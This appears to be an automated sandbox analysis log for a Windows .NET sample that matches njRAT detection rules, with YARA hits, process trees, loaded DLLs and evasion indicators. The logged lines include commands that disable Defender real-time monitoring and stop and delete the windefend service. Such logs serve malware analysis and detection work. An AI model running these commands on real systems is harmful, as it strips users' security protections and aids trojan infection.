          Source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
          Source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
          Source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
          Source: G1lnGpOLK4.exeStatic PE information: Section: .reloc ZLIB complexity 0.99609375
          Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@37/7@13/6
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8184:120:WilError_03
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeMutant created: \Sessions\1\BaseNamedObjects\f2d4732908d59805d830a49d36974ac0
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5436:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7924:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8124:120:WilError_03
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ojnmq5j.r54.ps1Jump to behavior
          Source: G1lnGpOLK4.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: G1lnGpOLK4.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: G1lnGpOLK4.exeReversingLabs: Detection: 68%
          Source: G1lnGpOLK4.exeVirustotal: Detection: 70%
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeFile read: C:\Users\user\Desktop\G1lnGpOLK4.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\G1lnGpOLK4.exe "C:\Users\user\Desktop\G1lnGpOLK4.exe"
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=2036,i,13697505174205213952,6185066048164698462,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeProcess created: C:\Windows\System32\cmd.exe cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $true
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeProcess created: C:\Windows\System32\cmd.exe cmd /c sc query windefend
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query windefend
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeProcess created: C:\Windows\System32\cmd.exe cmd /c sc stop windefend
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop windefend
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeProcess created: C:\Windows\System32\cmd.exe cmd /c sc delete windefend
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc delete windefend
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeProcess created: C:\Windows\System32\cmd.exe cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring $trueJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeProcess created: C:\Windows\System32\cmd.exe cmd /c sc query windefendJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeProcess created: C:\Windows\System32\cmd.exe cmd /c sc stop windefendJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeProcess created: C:\Windows\System32\cmd.exe cmd /c sc delete windefendJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=2036,i,13697505174205213952,6185066048164698462,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $trueJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query windefendJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop windefendJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc delete windefendJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeSection loaded: security.dllJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dllJump to behavior
          Source: G1lnGpOLK4.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeFile opened: C:\Windows\WinSxS\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_88e266cb2fac7c0d\MSVCR80.dllJump to behavior
          Source: G1lnGpOLK4.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

          Data Obfuscation

          barindex
          Source: G1lnGpOLK4.exe, _.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
          Source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, OK.cs.Net Code: Plugin System.Reflection.Assembly.Load(byte[])
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeCode function: 0_2_00007FFD9B8E1443 push ebx; ret 0_2_00007FFD9B8E15EA
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeCode function: 0_2_00007FFD9B8E2354 push ecx; retf 485Fh0_2_00007FFD9B8E3186
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeCode function: 0_2_00007FFD9B8E1EDA push ecx; retf 485Fh0_2_00007FFD9B8E3186
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query windefend

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\G1lnGpOLK4.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
